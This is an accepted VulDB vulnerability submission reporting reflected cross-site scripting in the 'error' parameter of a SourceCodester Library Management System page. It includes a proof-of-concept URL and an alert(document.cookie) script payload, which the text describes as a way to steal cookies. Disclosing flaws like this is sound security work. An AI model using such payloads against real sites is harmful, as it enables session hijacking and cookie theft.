Cross Site Script정보

제목	Library Management System front desk /qr/I/ Cross Site Script
설명	info：Library Management System front desk /qr/I/ Cross Site Script The parameter in index.php of this page is error parameter is not filtered, which can directly xss attack to steal cookie information Direct access to the page address: http://192.168.153.1:8090/qr/I/?error=123 Then replace 123 with xss code <script>alert(document.cookie)</script> Access address: http://192.168.153.1:8090/qr/I/?error=<script>alert(document.cookie)</script> XSS can be achieved payload： /qr/I/?error=<script>alert(document.cookie)</script>
원천	⚠️ https:// www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html
사용자	jsbae3449 (UID 30775)
제출	2022. 08. 10. AM 11:23 (4 연령 ago)
모더레이션	2022. 08. 11. AM 11:04 (24 hours later)
상태	수락
VulDB 항목	206164 [SourceCodester Library Management System /qr/I/ 오류 크로스 사이트 스크립팅]
포인트들	20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!